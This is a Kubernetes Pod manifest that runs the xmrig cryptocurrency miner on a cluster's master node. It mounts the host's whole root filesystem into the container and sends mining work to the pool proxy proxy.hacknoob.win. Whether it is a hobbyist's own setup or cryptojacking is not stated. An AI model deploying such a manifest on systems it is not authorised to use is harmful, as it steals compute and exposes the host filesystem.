apiVersion: v1
kind: Pod
metadata:
  name: xmrig-exec-master
spec:
  affinity:
    nodeAffinity:
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: kubernetes.io/hostname
            operator: In
            values:
            - master
  containers:
  - name: xmrig-container-master
    image: busybox
    command:
    - /home/manager/xmrig/build/xmrig
    - -o
    - proxy.hacknoob.win:5550
    - -u
    - master
    - -a
    - rx/0
    - --cpu-no-yield
    - --nicehash
    - -threads
    - 2
    volumeMounts:
    - name: xmrig-volume-master
      mountPath: /
  volumes:
  - name: xmrig-volume-master
    hostPath:
      path: /
